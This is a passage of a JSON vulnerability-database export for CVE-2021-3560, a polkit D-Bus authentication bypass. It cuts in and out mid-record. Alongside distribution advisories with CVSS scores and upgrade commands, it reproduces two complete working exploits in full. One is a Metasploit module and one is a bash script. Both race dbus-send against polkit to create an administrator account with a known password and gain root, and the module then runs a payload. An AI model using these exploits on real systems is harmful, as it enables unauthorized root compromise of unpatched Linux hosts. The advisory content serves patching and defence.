"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "id": "ALPINE:CVE-2021-3560", "href": "https://security.alpinelinux.org/vuln/CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-06-19T16:34:56", "description": "A flaw was found in polkit. When a requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts, the process cannot get a unique uid and pid of the process and it cannot verify the privileges of the requesting process (CVE-2021-3560). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T21:45:12", "type": "mageia", "title": "Updated polkit packages fix a security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-08T21:45:12", "id": "MGASA-2021-0244", "href": "https://advisories.mageia.org/MGASA-2021-0244.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-19T15:15:32", "description": "A vulnerability 
exists within the polkit system service that can be leveraged by a local, unprivileged attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a method over D-Bus and kills the client process. This will occasionally cause the operation to complete without being subjected to all of the necessary authentication. The exploit module leverages this to add a new user with a sudo access and a known password. The new account is then leveraged to execute a payload with root privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-10T00:00:00", "type": "zdt", "title": "Polkit D-Bus Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-10T00:00:00", "id": "1337DAY-ID-36544", "href": "https://0day.today/exploit/description/36544", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include 
Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Local::Linux\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Polkit D-Bus Authentication Bypass',\n 'Description' => %q{\n A vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged\n attacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a\n method over D-Bus and kills the client process. This will occasionally cause the operation to complete without\n being subjected to all of the necessary authentication.\n The exploit module leverages this to add a new user with a sudo access and a known password. The new account\n is then leveraged to execute a payload with root privileges.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Kevin Backhouse', # vulnerability discovery and analysis\n 'Spencer McIntyre', # metasploit module\n 'jheysel-r7' # metasploit module\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Platform' => ['unix', 'linux'],\n 'References' => [\n ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],\n ['CVE', '2021-3560'],\n ['EDB', '50011']\n ],\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-06-03',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n register_options([\n OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\\$)$/),\n OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),\n OptInt.new('TIMEOUT', [true, 'The maximum 
time in seconds to wait for each request to finish', 30]),\n OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])\n ])\n register_advanced_options([\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ])\n end\n\n def get_loop_sequence\n datastore['ITERATIONS'].times.map(&:to_s).join(' ')\n end\n\n def exploit_set_realname(new_realname)\n loop_sequence = get_loop_sequence\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts/User0\n org.freedesktop.Accounts.User.SetRealName\n string:'#{new_realname}' &\n sleep #{@cmd_delay};\n kill $!;\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --print-reply\n /org/freedesktop/Accounts/User0\n org.freedesktop.DBus.Properties.Get\n string:org.freedesktop.Accounts.User\n string:RealName\n | grep \"string \\\\\"#{new_realname}\\\\\"\";\n if [ $? -eq 0 ]; then\n echo success;\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def executable?(path)\n cmd_exec(\"test -x '#{path}' && echo true\").include? 'true'\n end\n\n def get_cmd_delay\n user = rand_text_alphanumeric(8)\n time_command = \"bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\\\"#{user}\\\" int32:1'\"\n time = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\\s+\\d+m(\\d+.\\d+)s/)\n unless time && time[1]\n print_error(\"Unable to determine the time taken to run the dbus command, so the exploit cannot continue. Try increasing the TIMEOUT option. 
The command that failed was: #{time_command}\")\n return nil\n end\n\n time_in_seconds = time[1].to_f\n # The dbus-send command timeout is implementation-defined, typically 25 seconds\n # https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds\n if time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00\n print_error('The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being X11 instead of SSH. Please see the module documentation for more information.')\n return nil\n end\n time_in_seconds / 2\n end\n\n def check\n if datastore['TIMEOUT'] < 26\n return CheckCode::Unknown(\"TIMEOUT is set to less than 26 seconds, so we can't detect if polkit times out or not.\")\n end\n\n unless cmd_exec('pkexec --version') =~ /pkexec version (\\d+\\S*)/\n return CheckCode::Safe('The polkit framework is not installed.')\n end\n\n # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To\n # do that, the distro specific package manager would need to be queried. See #check_via_version.\n polkit_version = Rex::Version.new(Regexp.last_match(1))\n\n unless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/\n return CheckCode::Detected('The dbus-send command is not accessible, however the polkit framework is installed.')\n end\n\n # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit\n @cmd_delay = get_cmd_delay\n return CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. 
This is necessary in order to exploit the target.') if @cmd_delay.nil?\n\n status = nil\n print_status('Checking for exploitability via attempt')\n status ||= check_via_attempt\n print_status('Checking for exploitability via version') unless status\n status ||= check_via_version\n status ||= CheckCode::Detected(\"Detected polkit framework version #{polkit_version}.\")\n\n status\n end\n\n def check_via_attempt\n status = nil\n return status unless !is_root? && command_exists?('dbus-send')\n\n # This is required to make the /org/freedesktop/Accounts/User0 object_path available.\n dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')\n # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a\n # random string before restoring it.\n result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')\n if result =~ /variant\\s+string\\s+\"(.*)\"/\n old_realname = Regexp.last_match(1)\n if exploit_set_realname(rand_text_alphanumeric(12))\n status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')\n unless exploit_set_realname(old_realname)\n print_error('Failed to restore the root user\\'s original \\'RealName\\' property value')\n end\n end\n end\n\n status\n end\n\n def check_via_version\n sysinfo = get_sysinfo\n case sysinfo[:distro]\n when 'fedora'\n if sysinfo[:version] =~ /Fedora( release)? 
(\\d+)/\n distro_version = Regexp.last_match(2).to_i\n if distro_version < 20\n return CheckCode::Safe(\"Fedora version #{distro_version} is not affected (too old).\")\n elsif distro_version < 33\n return CheckCode::Appears(\"Fedora version #{distro_version} is affected.\")\n elsif distro_version == 33\n # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-3f8d6016c9\n patched_version_string = '0.117-2.fc33.1'\n elsif distro_version == 34\n # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-0ec5a8a74b\n patched_version_string = '0.117-3.fc34.1'\n elsif distro_version > 34\n return CheckCode::Safe(\"Fedora version #{distro_version} is not affected.\")\n end\n\n result = cmd_exec('dnf list installed \"polkit.*\"')\n if result =~ /polkit\\.\\S+\\s+(\\d\\S+)\\s+/\n current_version_string = Regexp.last_match(1)\n if Rex::Version.new(current_version_string) < Rex::Version.new(patched_version_string)\n return CheckCode::Appears(\"Version #{current_version_string} is affected.\")\n else\n return CheckCode::Safe(\"Version #{current_version_string} is not affected.\")\n end\n end\n end\n when 'ubuntu'\n result = cmd_exec('apt-cache policy policykit-1')\n if result =~ /\\s+Installed: (\\S+)$/\n current_version_string = Regexp.last_match(1)\n current_version = Rex::Version.new(current_version_string.gsub(/ubuntu/, '.'))\n\n if current_version < Rex::Version.new('0.105-26')\n # The vulnerability was introduced in 0.105-26\n return CheckCode::Safe(\"Version #{current_version_string} is not affected (too old, the vulnerability was introduced in 0.105-26).\")\n end\n\n # See: https://ubuntu.com/security/notices/USN-4980-1\n # The 'ubuntu' part of the string must be removed for Rex::Version compatibility, treat it as a point place.\n case sysinfo[:version]\n when /21\\.04/\n patched_version_string = '0.105-30ubuntu0.1'\n when /20\\.10/\n patched_version_string = '0.105-29ubuntu0.1'\n when /20\\.04/\n patched_version_string = '0.105-26ubuntu1.1'\n when /19\\.10/\n 
return CheckCode::Appears('Ubuntu 19.10 is affected.')\n end\n # Ubuntu 19.04 and older are *not* affected\n\n if current_version < Rex::Version.new(patched_version_string.gsub(/ubuntu/, '.'))\n return CheckCode::Appears(\"Version #{current_version_string} is affected.\")\n end\n\n return CheckCode::Safe(\"Version #{current_version_string} is not affected.\")\n end\n end\n end\n\n def cmd_exec(*args)\n result = super\n result.gsub(/(\\e\\(B)?\\e\\[([;\\d]+)?m/, '') # remove ANSI escape sequences from the command output\n end\n\n def dbus_method_call(object_path, interface_member, *args)\n cmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply]\n cmd_args << object_path\n cmd_args << interface_member\n args.each do |arg|\n if arg.is_a?(Integer)\n cmd_args << \"int32:#{arg}\"\n elsif arg.is_a?(String)\n cmd_args << \"string:'#{arg}'\"\n end\n end\n\n cmd = cmd_args.join(' ')\n vprint_status(\"Running: #{cmd}\")\n cmd_exec(cmd)\n end\n\n def create_unix_crypt_hash\n UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)\n end\n\n def exploit_set_username(loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts\n org.freedesktop.Accounts.CreateUser\n string:#{datastore['USERNAME']}\n string:\\\"#{datastore['USERNAME']}\\\"\n int32:1 &\n sleep #{@cmd_delay}s;\n kill $!;\n if id #{datastore['USERNAME']}; then\n echo \\\"success\\\";\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def exploit_set_password(uid, hashed_password, loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts/User#{uid}\n org.freedesktop.Accounts.User.SetPassword\n string:'#{hashed_password}'\n string: &\n sleep #{@cmd_delay}s;\n kill $!;\n echo 
#{datastore['PASSWORD']}\n | su - #{datastore['USERNAME']}\n -c \\\"echo #{datastore['PASSWORD']} | sudo -S id\\\"\n | grep \\\"uid=0(root)\\\";\n if [ $? -eq 0 ]; then\n echo \\\"success\\\";\n break;\n fi;\n done;\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def exploit_delete_user(uid, loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts\n org.freedesktop.Accounts.DeleteUser\n int64:#{uid}\n boolean:true &\n sleep #{@cmd_delay}s;\n kill $!;\n if id #{datastore['USERNAME']}; then\n echo \\\"failed\\\";\n else\n echo \\\"success\\\";\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def upload(path, data)\n print_status(\"Writing '#{path}' (#{data.size} bytes) ...\")\n rm_f(path)\n write_file(path, data)\n register_file_for_cleanup(path)\n end\n\n def upload_and_chmodx(path, data)\n upload(path, data)\n chmod(path)\n end\n\n def upload_payload\n fname = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}\"\n upload_and_chmodx(fname, generate_payload_exe)\n return nil unless file_exist?(fname)\n\n fname\n end\n\n def execute_payload(fname)\n cmd_exec(\"echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \\\"echo #{datastore['PASSWORD']} | sudo -S #{fname}\\\"\")\n end\n\n def exploit\n fail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su')\n fail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send')\n if datastore['TIMEOUT'] < 26\n fail_with(Failure::BadConfig, \"TIMEOUT is set to less than 26 seconds, so we can't detect if dbus-send times out or not.\")\n end\n\n if @cmd_delay.nil?\n # cmd_delay wasn't set yet which is needed for the rest of the exploit to operate,\n # likely cause the check method wasn't executed. 
Lets set it so long.\n\n # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit\n @cmd_delay = get_cmd_delay\n fail_with(Failure::Unknown, 'Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?\n end\n\n print_status(\"Attempting to create user #{datastore['USERNAME']}\")\n loop_sequence = get_loop_sequence\n\n fail_with(Failure::BadConfig, \"The user #{datastore['USERNAME']} was unable to be created. Try increasing the ITERATIONS amount.\") unless exploit_set_username(loop_sequence)\n uid = cmd_exec(\"id -u #{datastore['USERNAME']}\")\n print_good(\"User #{datastore['USERNAME']} created with UID #{uid}\")\n print_status(\"Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}\")\n if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)\n print_good('Obtained code execution as root!')\n fname = upload_payload\n execute_payload(fname)\n else\n print_error(\"Attempted to set the password #{datastore['Iterations']} times, did not work.\")\n end\n\n print_status('Attempting to remove the user added: ')\n if exploit_delete_user(uid, loop_sequence)\n print_good(\"Successfully removed #{datastore['USERNAME']}\")\n else\n print_warning(\"Unable to remove user: #{datastore['USERNAME']}, created during the running of this module\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36544", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:20:12", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "zdt", "title": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "1337DAY-ID-36421", "href": "https://0day.today/exploit/description/36421", "sourceData": "# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation\n# Exploit Author: J Smith (CadmusofThebes)\n# Vendor Homepage: https://www.freedesktop.org/\n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html\n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)\n# Tested on: Ubuntu 20.04, Fedora 33\n# CVE: CVE-2021-3560\n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\n\n#!/bin/bash\n\n# Set the name and display name\nuserName=\"hacked\"\nrealName=\"hacked\"\n\n# Set the account as an administrator\naccountType=1 \n\n# Set the password hash for 'password' and password hint\npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'\npassHint=\"password\"\n\n# Check Polkit version\npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9)\nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then\n echo \"[*] Vulnerable version of polkit found\"\nelse\n echo \"[!] 
WARNING: Version of polkit might not vulnerable\"\nfi\n\n# Validate user is running in SSH instead of desktop terminal\nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then\n echo \"[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\"\n exit\nfi\n\n# Test the dbus-send timing to load into exploit\necho \"[*] Determining dbus-send timing\"\nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 )\nhalfTime=$(echo \"scale=3;$realTime/2\" | bc)\n\n# Check for user first in case previous run of script failed on password set\nif id \"$userName\" &>/dev/null; then\n userid=$(id -u $userName)\n echo \"[*] New user $userName already exists with uid of $userid\"\nelse\n userid=\"\"\n\techo \"[*] Attempting to create account\"\n while [[ $userid == \"\" ]]\n do\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\n if id \"$userName\" &>/dev/null; then\n\t userid=$(id -u $userName)\n echo \"[*] New user $userName created with uid of $userid\"\n fi\n done\nfi\n\n# Add the password to /etc/shadow\necho \"[*] Adding password to /etc/shadow\"\nx=0\nwhile [ $x -lt 100 ]\ndo \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\n x=$(($x + 1))\ndone\n\necho \"[*] Exploit complete! 
If the password does not work, run the exploit again\"\necho \"\"\necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\"\n", "sourceHref": "https://0day.today/exploit/36421", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-06-19T15:33:05", "description": "### Background\n\npolkit is a toolkit for managing policies related to unprivileged processes communicating with privileged process. \n\n### Description\n\nThe function polkit_system_bus_name_get_creds_sync() was called without checking for error, and as such temporarily treats the authentication request as coming from root. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll polkit users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-auth/polkit-0.119\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "gentoo", "title": "polkit: Privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-3560"], "modified": "2021-07-13T00:00:00", "id": "GLSA-202107-31", "href": "https://security.gentoo.org/glsa/202107-31", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "almalinux": [{"lastseen": "2022-02-28T20:28:19", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "almalinux", "title": "Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-08-11T08:41:45", "id": "ALSA-2021:2238", "href": "https://errata.almalinux.org/8/ALSA-2021-2238.html", "cvss": 
{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-03-01T23:14:45", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. ([CVE-2021-3560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T06:05:00", "type": "f5", "title": "polkit vulnerability CVE-2021-3560", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-03-01T23:13:00", "id": "F5:K41410307", "href": "https://support.f5.com/csp/article/K41410307", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-06-19T15:36:19", "description": "## 
Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n\n## Packages\n\n * policykit-1 \\- framework for managing administrative policies and privileges\n\nKevin Backhouse discovered that polkit incorrectly handled errors in the \npolkit_system_bus_name_get_creds_sync function. A local attacker could \npossibly use this issue to escalate privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "ubuntu", "title": "polkit vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "USN-4980-1", "href": "https://ubuntu.com/security/notices/USN-4980-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-07-09T17:17:59", "description": "", "cvss3": {}, "published": "2021-07-09T00:00:00", "type": "packetstorm", "title": "Polkit D-Bus Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-09T00:00:00", "id": "PACKETSTORM:163452", "href": 
